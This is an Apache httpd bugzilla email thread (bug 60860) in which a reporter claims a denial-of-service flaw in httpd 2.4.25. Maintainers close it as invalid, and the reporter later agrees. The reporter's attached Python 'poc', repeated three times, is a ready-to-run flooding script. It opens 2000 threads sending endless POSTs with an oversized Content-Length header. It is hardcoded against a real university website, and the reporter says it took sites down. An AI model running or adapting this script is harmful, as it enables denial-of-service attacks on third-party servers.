You are viewing a plain text version of this content. The canonical link for it is here.
Posted to bugs@httpd.apache.org by bu...@apache.org on 2017/03/14 05:46:23 UTC
[Bug 60860] New: Apache httpd Dos Bug
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
Bug ID: 60860
Summary: Apache httpd Dos Bug
Product: Apache httpd-2
Version: 2.4.25
Hardware: PC
Status: NEW
Severity: normal
Priority: P2
Component: All
Assignee: bugs@httpd.apache.org
Reporter: buch0b2@gmail.com
Target Milestone: ---
Created attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819&action=edit
poc
for num in range(2000):
buf += "AAAAA"
headers = {'Content-Length': str(0xFFFFFFFFFFFF),'Content-Type':
'text/html'}
if buffer is over 10000 size,allow to set arbitrary Content-Length. so looping
program and slow connection or dead connection.
try to run poc.
Thanks.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Vulnerability
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
William A. Rowe Jr. <wr...@apache.org> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |INVALID
Status|UNCONFIRMED |RESOLVED
--- Comment #13 from William A. Rowe Jr. <wr...@apache.org> ---
Closing per reporter comment #12
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #2 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
> try:
>
> c = httplib.HTTPConnection(url, aport)
>
> buf = ""
> for num in range(2000):
> buf += "AAAAA"
>
> headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
> params = urllib.urlencode({'bitch': buf})
> c.request(method,path,body=params,headers=headers);
>
> print c.getresponse().read()
> c.close()
> except Exception, e:
> print "fuck"
> pass
>
>def requests():
> while True:
> send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
> threading.Thread(target=requests).start()
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Vulnerability
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Summary|Apache httpd Dos Bug |Apache httpd Dos
| |Vulnerability
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
OS| |All
--- Comment #6 from buch0 <bu...@gmail.com> ---
please look poc2.poc was missed
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #1 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
> try:
>
> c = httplib.HTTPConnection(url, aport)
>
> buf = ""
> for num in range(2000):
> buf += "AAAAA"
>
> headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
> params = urllib.urlencode({'bitch': buf})
> c.request(method,path,body=params,headers=headers);
>
> print c.getresponse().read()
> c.close()
> except Exception, e:
> print "fuck"
> pass
>
>def requests():
> while True:
> send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
> threading.Thread(target=requests).start()
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |apache@gagravarr.org
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #11 from buch0 <bu...@gmail.com> ---
Movie:https://www.youtube.com/watch?v=acQrNO5g1Qo
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
Eric Covener <co...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|--- |INVALID
Status|NEW |RESOLVED
--- Comment #8 from Eric Covener <co...@gmail.com> ---
yes, 2000 threads in an application that buffers large inputs is expensive, but
we don't consider it a vulnerability in the server. We also don't expect
vulnerabilities to be reported on public bugzilla.
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |buch0b2@gmail.com,
| |vinci@protonmail.ch
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC|apache@gagravarr.org |
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Vulnerability
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #12 from buch0 <bu...@gmail.com> ---
oops it's not a bug sorry plz close
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #3 from buch0 <bu...@gmail.com> ---
Comment on attachment 34819
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34819
poc
> #! /usr/bin/env python
>
>import httplib,urllib
>import time
>import sys
>import threading
>import subprocess
>import random
>
>aurl = ""
>aport = 0
>
>def send_request(method, url, path):
> try:
>
> c = httplib.HTTPConnection(url, aport)
>
> buf = ""
> for num in range(2000):
> buf += "AAAAA"
>
> headers = {'Content-Length': str(0xFFFFFFFFFFF),'Content-Type': 'text/html','User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.52 Safari/537.36'}
>
> params = urllib.urlencode({'bitch': buf})
> c.request(method,path,body=params,headers=headers);
>
> print c.getresponse().read()
> c.close()
> except Exception, e:
> print "fuck"
> pass
>
>def requests():
> while True:
> send_request("POST", aurl, "")
>
>aurl = "www.kagawa-u.ac.jp"
>aport = 80
>
>for num in range(2000):
> threading.Thread(target=requests).start()
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #10 from buch0 <bu...@gmail.com> ---
i already tried this poc on any sites,these were down!
it's bug!
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
Resolution|INVALID |---
Ever confirmed|1 |0
Status|RESOLVED |UNCONFIRMED
--- Comment #9 from buch0 <bu...@gmail.com> ---
(In reply to Eric Covener from comment #8)
> yes, 2000 threads in an application that buffers large inputs is expensive,
> but we don't consider it a vulnerability in the server. We also don't
> expect vulnerabilities to be reported on public bugzilla.
hey girl,please remove 'Content-Length': str(0xFFFFFFFFFFF), from headers
and try it out. don't down.if you add 'Content-Length': str(0xFFFFFFFFFFF), to
headers if site will down(if you try it on localhost,will down)
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #7 from buch0 <bu...@gmail.com> ---
idk is it a bug... sorry i am noob man
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #5 from buch0 <bu...@gmail.com> ---
Created attachment 34821
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34821&action=edit
image
image of poc
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
buch0 <bu...@gmail.com> changed:
What |Removed |Added
----------------------------------------------------------------------------
CC| |apache@gagravarr.org
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org
[Bug 60860] Apache httpd Dos Bug
Posted by bu...@apache.org.
https://bz.apache.org/bugzilla/show_bug.cgi?id=60860
--- Comment #4 from buch0 <bu...@gmail.com> ---
Created attachment 34820
--> https://bz.apache.org/bugzilla/attachment.cgi?id=34820&action=edit
poc2
poc2
--
You are receiving this mail because:
You are the assignee for the bug.
---------------------------------------------------------------------
To unsubscribe, e-mail: bugs-unsubscribe@httpd.apache.org
For additional commands, e-mail: bugs-help@httpd.apache.org